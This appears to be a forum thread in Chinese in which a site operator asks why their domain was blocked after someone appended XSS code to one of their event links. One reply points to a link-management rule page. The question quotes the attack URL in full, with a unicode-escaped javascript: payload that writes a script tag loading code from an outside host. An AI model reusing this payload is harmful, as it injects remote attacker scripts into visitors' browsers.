收藏
回答

求助,有人恶意在我们正常链接后加xss攻击代码,程序不会执行该代码,但域名还是被封禁,需要怎么处理?

我们已经把恶意执行代码做了过滤,申请解封还是不通过

问题链接:https://chinaevent.microsoft.com/app/meetings/MeetingPc/Detail/indoeffax/ursdp?active=5&channel_id=74&channel_name=CSDN&id=406poiu987'?location.href=`ja\u0076\u0061\u0073\u0063\u0072\u0069\u0070\u0074\u003a\u0064\u006f\u0063\u0075\u006d\u0065\u006e\u0074\u005b\u0027\u0077\u0072\u0069\u0074\u0065\u0027\u005d\u0028\u0027\u003c\u0073\u0063\u0072\u0069\u0070\u0074\u0020\u0073\u0072\u0063\u003d\u002f\u002f\u007a\u0032\u002e\u0064\u0075\u006f\u0078\u006a\u002e\u0063\u006f\u006d\u002f\u0078\u0027\u002b\u0077\u0069\u006e\u0064\u006f\u0077\u002e\u006c\u006f\u0063\u0061\u0074\u0069\u006f\u006e\u002e\u0073\u0065\u0061\u0072\u0063\u0068\u002b\u0027\u003e\u003c\u002f\u0073\u0063\u0072\u0069\u0070\u0074\u003e\u0027\u0029\u003b`:'&pf_type=3&pf_uid=5407_3&source=2&tag_id=a697bc6da3af9886&U2FsdGVkX1zzdsgbfh2FCNPw9skDRS2Kzzdsgbfh2FbSS6fJEtHK6XdXVMKoFGVJwqeUhOWJuJ1QthbUC6RBxnmRQQBOCy7VF3TbTuBaQjN9CwTsDnzzdsgbfh2FSJ7RxgEJOUgbmD5LQru7glA8BTReuzY#1606971084380


当用户访问问题链接,系统过滤后跳转地址:https://chinaevent.microsoft.com/error/index?num=110

回答关注问题邀请回答
收藏

1 个回答

  • 🍺
    🍺
    2020-12-26
    http://weixin.qq.com/cgi-bin/readtemplate?t=weixin_external_links_content_management_specification
    2020-12-26
    有用
    回复 1
    • 霍鸿川007
      霍鸿川007
      2020-12-26
      这个规范看了,主要是已经把xss攻击的代码给过滤掉了,申请恢复还是不通过,也未反馈原因- -!
      2020-12-26
      回复
登录 后发表内容
问题标签